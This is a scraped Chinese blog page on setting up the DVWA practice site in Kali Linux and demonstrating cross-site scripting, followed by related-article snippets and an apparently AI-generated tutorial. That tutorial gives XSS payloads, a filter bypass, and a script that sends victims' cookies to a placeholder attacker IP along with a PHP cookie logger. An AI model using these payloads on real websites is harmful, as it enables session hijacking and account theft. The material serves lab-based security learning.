Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建_kali实验xss攻击

最新推荐文章于 2024-11-18 09:43:06 发布
原创 最新推荐文章于 2024-11-18 09:43:06 发布 · 969 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #web安全 #xss

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

5.部署 DVWA 网站系统 在浏览器中输入:http://192.168.1.63/DVWA-master/setup.php 在这里插入图片描述

点创建数据库后, 等待 10 秒,就可以安装成功 DVWA 了。

  1. 后期登录: http://192.168.1.63/DVWA-master/login.php dvwa 的登录界面的默认用户名:admin ,密码: password

在这里插入图片描述

到此安装成功 DVWA。创建一个快照。

在这里插入图片描述

安装好 sqli-libs 和 DVWA 靶机环境

在这里插入图片描述

我们将安全级别调到 LOW,方便从基础开始学习。

在这里插入图片描述

反射型 XSS 原理

我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后下面会增加对应的信息。 Reflected [rɪˈflektɪd] 反射

在这里插入图片描述

点击 submit 按钮,查 URL 链接: http://192.168.1.63/DVWA-master/vulnerabilities/xss_r/?name=mk#

在这里插入图片描述

根据回显信息判断出,显示的文本内容是 Hello name。我们输入的信息被存放在name。我们输入的信息被存放在 name。我们输入的信息被存放在 name 变量中。 我们添加一条 JavaScript 代码获叏 cookie

<
最低0.47元/天 解锁文章

200万优质内容无限畅学
Kali Linux-网络安全-XSS 跨站脚本攻击原理DVWA 靶机搭建
xueshenlaila的博客
12-31 1490
XSS 跨站脚本攻击 使用 JavaScript 创建 Cookie JavaScript 可以使用 document.cookie 属性来创建 、读叏、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie=“username=John Doe”; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 戒 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie=“username=John
linux-kali利用BeEF 执行 XSS 攻击
LCH14777475118的博客
06-26 428
文件,在文件里面找到这两串代码。软件(下载最新版的就可以),复制为一个副本,将副本修改为。安装目录中启动它(注意:新的。软件可以用来进行站点搭建。就勾上了靶机所在的浏览器了。,双击从记事本里面打开。,或者可以在配置文件。
掌握Kali LinuxWeb渗透测试 - XSS攻击详解
lzc0604007的博客
11-18 1381
在数字化时代,网络安全成为企业和个人不可忽视的关键问题。随着网络攻击手段的不断演进,传统的安全防御措施显得捉襟见肘。作为应对,Web渗透测试成为了评估和提升网络安全性的重要方法之一。通过模拟黑客攻击,我们可以发现系统中的潜在漏洞并及时修复,从而提升整体的安全性。Kali Linux,这款专为网络安全测试设计的Linux发行版,因其集成了众多强大的渗透测试工具而受到广泛关注。本文将带您深入了解如何使用Kali Linux进行有效的Web渗透测试,特别是针对跨站脚本攻击XSS)的检测与利用。
kali运行脚本 xss攻击payload 提取cookie
2401_84908950的博客
11-10 579
kali开启小型服务器运行xss脚本抓取cookie 复现:dvwa-存储型xxs
Kali Linux-网络安全-XSS 跨站脚本攻击原理DVWA 靶机搭建_kali实验xss攻击(2)
2301_79054215的博客
04-26 838
注:document.cookie 将以字符串的方式返回所有的 cookie,类型格式: cookie1=value;
Kali Linux-网络安全-XSS 跨站脚本攻击原理DVWA 靶机搭建_kali实验xss攻击(1)
m0_55030688的博客
05-10 956
root@xuegod63 config]# cp config.inc.php.dist config.inc.php #基于模版配置文件,生成。为:21 $_DVWA[ ‘db_password’ ] = ‘123456’;[root@xuegod63 ~]# vim /var/www/html/dom.html #创建一个加载了 javascript 脚本。改:21 $_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’;为: allow_url_include = On。
kali-linux 搭建DVWA
qu_xiao_lei的博客
10-13 1045
在主机下载DVWAhttp://www.dvwa.co.uk/并解压,重命名为dvwa后拖进虚拟机的桌面目录。(VMware Tools安装方法https://blog.csdn.net/u011585332/article/details/105120544?utm_source=app) ????第一:打开dvwa/dvwa/config,将config.inc.php.dist的后缀.dist去掉。 ????第二:打开config.inc.php 修改为: $_DVWA[ ‘db_user’ ] =
Kali Linux 配置DVWA
HK_Sky的博客
09-02 1428
一、准备材料 DVWA 压缩文件(一个PHP网站)    # 可以从官网下载该文件: http://www.dvwa.co.uk/ Apache2 服务器软件    # Kali 默认安装好了. MySql 数据库    # Kali 默认安装好了 root 用户密码为空. 二、开始操作 1.将DVWA-master网站放到合适的位置: # rm /var/www/html/* # un...
Kali linux里面安装dvwa
sr31275720281的博客
04-20 5352
Kali linux里面安装dvwa 学习网络安全,光学概念肯定是没有什么大用的,还是得学习一些实际操作的硬本事,搞安全有时候得意识强,但是不是什么环境都可以用来搞,选择合适的地点也很重要的。 DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序,包含了SQL注入、XSS、远程命令执行等...
XSS另类攻击(四)kali系统beef-xss安装和使用
06-01 1806
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
胡乱自学黑客的,能骂醒一个算一个
2401_84208172的博客
05-05 1123
为啥说胡乱自学黑客的,能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了,其实再真正的黑客眼里,你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知,其实最重要的是兴趣热爱,不同于网络安全工程师,他们大都是培训机构培训出来的,具备的基本都是防御和白帽子技能,他们绝大多数的人看的是工资,他们是为了就业而学习,为了走捷径才去参加培训。
2020-11-22
qq_51370368的博客
11-24 467
实验XSS和SQL注入 实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户
kali 中安装 beef-xss
挖到0day了吗?
02-27 1604
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。beef是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。本文将介绍安装beef。新版的kail已经不自带beef工具了,需要自己下载。
XSS攻击DVWA
天威一号
11-21 256
1、 解析:在标签之间,有存在对字符的过滤; <pre>Hello '&quot;&lt;&gt;script</pre>
kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF
weixin_43239236的博客
01-23 314
存储型XSS 1、可长期存储于服务器端 2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口 #攻击利用方法大体等于反射型xss利用 ##多出现在留言板等位置 *推荐使用burpsuite a、观察返回结果,是否原封不动地返回输入数据?是否有其他标签 js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗 注入后会永久在服务器端,每次访问都会下发该注入。 用dvwa测试的时候消除注入需在设置中重置数据库 b、测试加载攻击者控制的服务器中的js文件 #启动apache2【默
kali渗透测试之Web渗透-XSS-漏洞利用-键盘记录器,xsser
hacker3062的博客
09-15 491
进行html编码,目前最有效的方法(并非完全不可绕过【不需要尖括号的情况:如】)】{可用burpsuite进行编码}-v:显示详细信息;–heuristic  探测服务器,检查被过滤的字符(会发送大量请求){脑洞:sql}  【所有过滤机制都是基于字符过滤】伪造诱人连接{如:限时抢购门票、手机等},转到存在xss漏洞的页面【主要危害为登录页面】,窃取用户登录账号密码。可使用图形化界面  xsser --gtk  【不建议使用,界面不够友好】:将对应页面和参数写进**-g**参数中;
XSS跨站脚本攻击,用卡利完成。
最新发布
07-01
<think>我们正在讨论的是KaliLinux上进行XSS跨站脚本攻击的教程。根据引用内容,XSS攻击分为反射型、存储型和DOM型,而实践环境通常使用DVWA(Damn Vulnerable WebApplication)靶机。下面将分步骤说明如何在Kali Linux搭建DVWA并进行XSS攻击实验。 ###步骤1:安装Kali Linux并更新系统确保你已安装KaliLinux。打开终端,执行以下命令更新系统:```bashsudoapt update&& sudoapt upgrade-y```###步骤2:安装必要的软件DVWA需要Web服务器(如Apache)、数据库(如MySQL)和PHP支持。在KaliLinux上安装LAMP环境: ```bashsudo aptinstall apache2mysql-serverphp libapache2-mod-phpphp-mysql -y``` ###步骤3:启动Apache和MySQL服务```bashsudo systemctl startapache2sudo systemctl startmysql``` ###步骤4:配置MySQL数据库运行安全脚本并设置root密码(按提示操作):```bashsudomysql_secure_installation``` 登录MySQL,创建DVWA数据库和用户:```bashsudomysql -u root-p```在MySQL提示符下执行:```sqlCREATEDATABASEdvwa; CREATEUSER 'dvwa'@'localhost'IDENTIFIED BY'password'; GRANT ALLPRIVILEGES ONdvwa.* TO'dvwa'@'localhost';FLUSHPRIVILEGES;exit;``` ###步骤5:下载并配置DVWA下载DVWA:```bashcd/var/www/htmlsudogit clonehttps://github.com/digininja/DVWA.git```设置权限: ```bashsudo chown -R www-data:www-dataDVWAsudochmod-R755DVWA```###步骤6:配置DVWA数据库连接复制配置文件模板: ```bashcd DVWA/configsudocp config.inc.php.dist config.inc.php``` 编辑`config.inc.php`,修改数据库连接信息:```php$_DVWA['db_user'] ='dvwa';$_DVWA['db_password'] ='password'; ```###步骤7:访问DVWA并初始化在浏览器中打开:`http://localhost/DVWA/setup.php`,点击“Create/ResetDatabase”按钮初始化数据库。默认登录凭证:`admin`/`password`。 ###步骤8:进行XSS攻击实验以反射型XSS为例: 1.在DVWA左侧选择“XSS Reflected”。2.在输入框中尝试注入脚本,例如:`<script>alert(document.cookie)</script>`。 3.提交后,如果页面弹出包含cookie的警告框,说明攻击成功。 存储型XSS(在留言板等处注入)和DOM型XSS(通过修改URL参数触发)实验方法类似,但需注意DVWA安全级别设置(可在DVWA中调整)。###注意事项-实验仅在本地环境进行,切勿对未授权网站进行测试。 -理解每种XSS类型的原理和防御措施。§§相关问题§§1.如何防御XSS攻击? 2. DVWA中如何调整安全级别?3.除了DVWA,还有哪些常用的Web安全实验靶场?</think>### Kali Linux上进行XSS跨站脚本攻击的实践教程 XSS攻击通过在目标网站注入恶意脚本窃取用户信息或执行恶意操作[^1]。以下是在Kali Linux环境下进行XSS攻击实验的完整步骤: --- #### **一、环境准备** 1. **安装Kali Linux** 确保已安装最新版Kali Linux(推荐2023.x+版本) 2. **安装必要工具** ```bash sudo apt update sudo apt install apache2 php mysql-server git -y ``` 3. **启动服务** ```bash sudo systemctl start apache2 mysql ``` --- #### **二、搭建DVWA靶机** DVWA(Damn Vulnerable Web App)是专为安全测试设计的漏洞环境[^2]: ```bash cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git sudo chown -R www-data:www-data DVWA ``` 1. 访问 `http://localhost/DVWA/setup.php` 2. 点击 **Create/Reset Database** 初始化数据库 3. 登录账号:`admin`/`password` > 在DVWA安全设置中调整难度为 **LOW**:`DVWA Security -> Low` --- #### **三、XSS攻击实践** ##### **1. 反射型XSS**(非持久化攻击) ```bash # 访问XSS测试页面 http://localhost/DVWA/vulnerabilities/xss_r/?name=<script>alert(1)</script> ``` 当参数`name`被注入恶意脚本时,浏览器会执行弹窗[^3]。 ##### **2. 存储型XSS**(持久化攻击) 1. 进入DVWA的 **XSS Stored** 模块 2. 在留言板输入: ```html <script>alert(document.cookie);</script> ``` 3. 提交后,所有访问该页面的用户都会触发脚本泄露cookie ##### **3. DOM型XSS** ```bash # 构造恶意URL http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>alert("DOM XSS")</script> ``` --- #### **四、实战技巧** 1. **窃取Cookie** 使用真实攻击脚本: ```html <script>new Image().src="http://攻击者IP/cookie.php?c="+document.cookie;</script> ``` 在攻击机创建`cookie.php`: ```php <?php file_put_contents("stolen_cookies.txt", $_GET['c']); ?> ``` 2. **防御绕过** 当过滤`<script>`标签时尝试: ```html <img src=x onerror=alert(1)> ``` --- #### **五、防御建议** 1. 输入输出过滤(如HTML实体编码) 2. 使用CSP(Content Security Policy) 3. 设置HttpOnly Cookie标志 > ⚠️ **法律声明**:本教程仅用于授权环境的安全学习,未经授权的攻击行为违法。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值